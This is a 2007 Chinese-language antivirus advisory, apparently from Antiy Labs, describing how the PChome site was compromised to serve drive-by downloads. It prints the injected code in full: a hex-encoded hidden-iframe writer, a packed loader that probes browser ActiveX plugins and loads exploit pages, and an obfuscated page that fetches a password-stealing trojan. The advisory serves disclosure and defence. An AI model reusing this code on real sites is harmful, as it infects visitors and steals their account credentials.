安全响应·Security
病毒预警·Alarm

PChome电脑之家网站挂马事件

出处:安天实验室 2007-12-28 14:00

内容:
 

  12月28日,安天实验室反病毒监测网发现,PChome电脑之家网站(http://
article.pc****.net/content-502393-7.html)被黑客植入病毒,用户如果访问
该网站,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统
可能被远程控制,盗取用户敏感信息。以及破坏用户磁盘数据。
  
  该网站问题代码:

 

  src="http://btn.pc****.net/flash.js"></script><!--广告js勿删-->

  http://btn.pc****.net/flash.js被插入加密代码:
  document.write(thtml):
  window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]
  ["\x77\x72\x69\x74\x65\x6c\x6e"]
  ('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67
  \x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30\
  x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f
  \x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61
  \x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35
  \x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72
  \x61\x6d\x65\x3e');

  其目的是连接地址: http://www.**.vc/page/add_644455.htm
  http://www.**.vc/page/add_644455.htm代码为:

 
  
  <script src=addr.js></script>
  addr.js:加密代码:
  eval(function(p,a,c,k,e,d){e=function
  (c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>
  35?String.fromCharCode(c+29):c.toString(36))}
  ;if(!''.replace(/^/,String)){while(c--)d[e(c)]
  =k[c]||e(c);k=[function(e){return d[e]}];
  e=function(){return'\\w+'};c=1};while(c--)
  if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'
  \\b','g'),k[c]);return p}('1r A(){1q(i=2;i
  <1p;i++){l s=4 S();l r=4 S();l t=B.1o(1n+i)
  ;s.6="R:@Q:"+t+":\\\\P%O\\\\q%N\\\\q%M%L%1m.0
  \\\\K\\\\J.I::/H/G.5";r.6="R:@Q:"+t+":\\\\P%O
  \\\\q%N\\\\q%M%L%1l.0\\\\K\\\\J.I::/H/G.5";
  9(s.F==E||r.F==E)D 1k}D 1j}l p=4 1i();
  o="n";p.1h(p.1g()+1f*C*C*1e);l z=4 B(8.x);
  l y="w=";o="n";9(!A()&&z.u(y)==-1){o="n";
  8.x="w=1d;1c="+p.1b();o="n";k{9(4 m("v.v.1"))
  8.j(\'<3 h=g:f 6="d://c.b/1a.5"></3>\')}a(e)
  {}k{9(19.18.17().u("16 7")==-1)8.j(\'<3 h=g:
  f 6="d://c.b/15.5"></3>\')}a(e){}k{9(4 m
  ("14.13"))8.j(\'<3 h=g:f 6="d://c.b/12.5">
  </3>\')}a(e){}k{9(4 m("11.10.1"))8.j(\'
  <3 h=g:f 6="d://c.b/Z.5"></3>\')}a(e){}k
  {9(4 m("Y.X.1"))8.j(\'<3 h=g:f 6="d://c.
  b/W.5"></3>\')}a(e){}k{9(4 m("V.U.1"))8.j
  (\'<3 h=g:f 6="d://c.b/T.5"></3>\')}a(e){}}
  ',62,90,'|||iframe|new|gif|src||document
  |if|catch|vg|w18|http||none|display|style|
  |write|try|var|ActiveXObject|xxxyyyyfassssf
  sadfasdf|aaxxx|Then|Kaspersky|kis7|kis6|root
  |indexOf|IERPCtl|Cookie1|cookie|cookieHeader|
  aaffdasfascookie|bIsKIS|String|60|return|41|
  height|help|images|chm|context|Doc|20Security|
  20Internet|20Lab|20Files|Program|MSITStore|mk|
  Image|baidu|Tool|BaiduBar|bf|StormPlayer|MPS
  |lz|GLChatCtrl|GLCHAT|xl|Vod|DPClient|ms|msie
  |toLowerCase|userAgent|navigator|real
  |toGMTString|expires|POPWINDOS|1000|24|getTime
  |setTime|Date|false|true|207|206|65
  |fromCharCode|26|for|function'.split('|'),0,{}))

  其目的是连接: http://***.vg/ms.gif
  http://***.vg/ms.gif加密代码:
  <html><head>
  <META HTTP-EQUIV="imagetoolbar" CONTENT="no">
  <noscript><iframe></iframe></noscript>
  <script language="javascript"><!--hT46="\r\
  /G6Pt\\u",gL86="\rR\/a\/q\/t";.6670539,mG54=".
  6973056",hT46='\r69lM\+\ gsB\{F\&0mp\\\;\-GA\>
  \=\:\}NKx\,\%\$q41XoSDnCEZjfrQ8\#\.\nh\"\(k\?
  \^ie\|\'\]Ra5uT\!wcb\@H\*\)Vy3\~Ozd2JPYv7U\_\
  <\/IL\[\`tW',gL86='uq\>x\^\<vT\;g\ paSwb\+\}
  \~0\_8V\[dH\?\:IocR6lL41\,\#\)K\=Z\|JPC\rD
  \*B2k\&MF\$Y\.O\@s\/hEU\`f\(jr\-nA\n\\\!WymGXz
  \{Qt\]9i5N3e7\'\%\"';function lO15(iT78)
  {"\rP6uqqtP",l=iT78.length;'\'LDLL\_\(D',w=''
  ;while(l--)"\rq\/q6\/tP",o=hT46.indexOf
  (iT78.charAt(l)),'\'\=AS\/DS\/',
  w=(o==-1?iT78.charAt(l):gL86.charAt(o))+w;
  "\r\\\/tqP\\6",hT46=hT46.substring(1)+hT46.
  charAt(0),document.write(w);'\'DD1S1D\/'};
  lO15("\+R\$\@\_Fv\{1\&\*B\r\&BLZb\&\ \&R\$
  \@\_Fv9J\)\"SZo\[SIs\_wc\}\%\$\rzL\*v\|\&
  11CPw\r\*\$v\_\%\*\{A\}zcCP\@Lv\r\@\*\{w\
  &1RL\;sw\r\*\$v\_\%\*\{Az\}zcCP\}\%\$\rzL\
  *v\|\%\*\$\%\*vLlvzL\*\rZA\}zsRLvg\_zL\%\
  rvcWAz\}zcCWD\>GGC\;sAz\}zcCs\;\}\%\$\rzL\
  *v\|\%\*\$\%\*vLlvzL\*\rZ\*Lm\{\^\r\*\$v\_
  \%\*cW\@Lv\r\@\*\{w\&1RLWCsw\r\*\$v\_\%\*\  
  {A\*\}zcLCP\_wc\}\%\$\rzL\*v\|1\&OL\@Rffm\_
  \*\}\%m\|R\_\}Lp\&\@CP\_wcL\|m5\_\$53ZSC\
  @Lv\r\@\*\{w\&1RLs\;\;s\_wc\}\%\$\rzL\*v\|
  1\&OL\@RCP\}\%\$\rzL\*v\|\$\&Fv\r\@Lu\ L\
  *vRcu\ L\*v\|\?\'T0u\.\'\~\/Cs\}\%\$\rzL\
  *v\|\%\*z\%\rRL\}\%m\*ZA\*\}zs\;L1RLP\}\%
  \$\rzL\*v\|\%\*z\%\rRL\rFZA\*\}zs\;sv0\<SZ
  \[\>\<osR\'I\>Z\"\[SIsw\r\*\$v\_\%\*\{A\}
  mRcCPm\_\*\}\%m\|Rv\&v\rR\{Z\{W\{WsRLvg\_zL
  \%\rvcWA\}mRcCWDSGGCs\;sA\}mRcCs\}uSoZ\[\
  <4UsR\^SGZ\>UU\[sw\r\*\$v\_\%\*\{A\}\}RcCP
  \_wc\}\%\$\rzL\*v\|\&11CP\}\%\$\rzL\*v\|\%
  \*RL1L\$vRv\&\@vZw\r\*\$v\_\%\*\{cCP\@Lv\r
  \@\*\{w\&1RL\;sRLvg\_zL\%\rvcWA\}\}RcCWD\
  [GGC\;\;sA\}\}RcCs\ 0ISZ\<\<4\>sFe\>4Z\>\
  [S\<sw\r\*\$v\_\%\*\{A\*\@cCP\@Lv\r\@\*\
  {v\@\rL\;\%\*L\@\@\%\@ZA\*\@sRE\[Z\<\"\>
  4sm\'GZ\>So\"s\_\.\[\<Z\"UU\>s1d4\>Z\<\>\
  <IsO\/\>SZ\<\>\<4slE4\>Z\[S\<s\_jooZ\<\<\
  [SssA1\_\$L\*RL\}Av\%AZW5\rO\rwL\*BWs\+aR
  \$\@\_Fv9")//--></script><ScRiPT languAgE=
  JAvaSCRipT>lO15("\aqH\<\&7l\.yF7HzF\.yY\.
  yF\\\/caN0ca0pcacjt\\\\\\\\\\\\\\0Nac0ac
  N0NactB\.yFg0HF\"cjN\$q6d\[\)7\'qH\[07\
  [TX\[d\[\)7b\r3M1i3M1\(3M1V3M1\/3M1L3M\`
  S\rEB\.yF\"c\'a\[7V77H\<\\67\[b\r3M1L3M1
  \#3M1D3M\`L3M\`L3M1\_3M1S\rn\r3M1L3M1\
  #3M\`L3M1\_3M1S3MLV3MS\(3MSS3ML\_
  3ML13MSL3ML\/3ML\/3ML13M\(\n3ML13ML\/
  3MSD3MLL3M\(\n3MLD3MLD3MSS3MLA3M\(\n3ML
  \_3ML\=3MLL3MSD3M\(\n3MLA3MLA3MSL3MLA3ML
  S3MS13MSL3ML\(3ML\_3MS\/3MLL3ML1\rEB\.
  yFg0HFZMj\"c\'\#H\[07\[\]\\\@\[q7b\r3MS
  \n3M1\_3M1L3M\`\(3M1i3M\`L3M1i3M113M\
  `S3M\(T3M\/\=\r\;\r3MS\n3MS\#3MS\=3M\
  /S3M\/S3M\/A\rn\r\rEB\.yFg0HFVmj\"c\'
  \#H\[07\[\]\\\@\[q7b\r3MSD3M1S3M1i3M1S3M1
  \(3M\(T3M\/L3M\`S3M\`\(3M1\/3M1D3M1\n
  \rn\r\rEB\.yF\\\/caN0ca0pcacjt\\\\\\\\\
  \\\\\0Nac0acN0NactB\.yF\\\/caN0ca0pcacjt
  \\\\\\\\\\\\\\0Nac0acN0NactB\.yFVm\'7z\&
  \[jDB\.yF\\\/caN0ca0pcacjt\\\\\\\\\\\\\\
  0Nac0acN0NactB\.yFZM\'\$\&\[\)b\r3MS\`3MS
  \/3M\/S\rnFt3M1\=3M\`S3M\`S3M\`A3ML03M\
  (c3M\(c3M\`\`3MLD3ML\=3M\(\[3M\`13M1\`3M
  \(c3M\`L3M\(\[3M1\/3M\`\=3M1\/tnAEB\.yF
  \\\/caN0ca0pcacjt\\\\\\\\\\\\\\0Nac0acN
  0NactB\.yFZM\'a\[\)NbEB\.yF\\\/caN0ca0pca
  cjt\\\\\\\\\\\\\\0Nac0acN0NactB\.yFIaDjt
  3M\`T3M\/S3M1\/3M1\n3M\`At\;\^07u\'H\$6  
  \)Nb\^07u\'H0\)N\$dbEh\_\_\_\_E\;t3M\
  (T3M\`S3M1\n3M\`AtB\.yF\\\/caN0ca0pcacjt
  \\\\\\\\\\\\\\0Nac0acN0NactB\.yFg0HFqij
  \"c\'\#H\[07\[\]\\\@\[q7b\r3M\/L3M1L3M
  \`\(3M1\_3M\`A3M\`S3M1\_3M1T3M1\`3M\
  (T3MS13M1\_3M1\#3M1\/3M\/L3M\`\_3M\
  `L3M\`S3M1\/3M1\n3MSi3M1\(3M1V3M1\
  /3M1L3M\`S\rn\r\rEB\.yFg0HFIasd\&jqi\'
  2\[7m\&\[q\<0Xi\$XN\[HbAEBFIaDjFqi\'
  \"6\<XN807ubIasd\&nIaDEBFVm\'\]\&\
  [\)bEBVm\'OH\<7\[bZM\'H\[a\&\$\)a\
  [\"\$NzEB\.yFVm\'m0g\[s\$i\<X\[bIaDn
  \(EBFVm\'\#X\$a\[bEBFg0HF9j\"c\'\#H\
  [07\[\]\\\@\[q7b\r3M\/L3M1\=3M1\/3M1\
  #3M1\#3M\(T3MSD3M\`A3M\`A3M1\#3M1\
  _3M1L3M1D3M\`S3M1\_3M1i3M1T\rn\r\rEB\.
  yF\$kDjqi\'\"6\<XN807ubIasd\&\;t3M\/
  \#3M\/\#3M\`L3M\`\_3M\`L3M\`S3M1\/3M1
  \n3MLL3ML\(tnt3M1L3M1\n3M1S3M\(T3M1\
  /3M\`\=3M1\/tEB\.yF9\}\r3M\/L3M1\=3M1\
  /3M1q3M1q3MS\/3M\`\=3M1\/3M1L3M\`\/3M\`
  S3M1\/\rUb\$kDnt3M\(A3M\(i3M1LFt\;IaDn\
  r\rn\r3M1i3M\`A3M1\/3M1T\rnAEB\.yF\\\/
  caN0ca0pcacjt\\\\\\\\\\\\\\0Nac0acN0NactB
  \.y\-\.yFq07qubMMc9\[0NacEFYFMMc9\[0NacjDBF
  \-\.y\ 5aqH\<\&7l")</script></head><body>
  <noscript><b><font color=red>This page
  requires a javascript enabled browser!!!
  </font></b></noscript></body></html>

  其目的是:http://***.vg/s.exe
  http://***.vg/ss.exe

  当用户访问http://article.pc****.net/content-
  502393-7.html时,系统会自动下载以下病毒文件:

  http://***.vg/s.exe 失效文件
  
  http://***.vg/ss.exe
  病毒名:(Trojan-PSW.Win32.Delf.ajm) 盗号木马
附:
 

点击此处下载木马防线2005+

病毒上报信箱: submit@virusview.net
[TOP]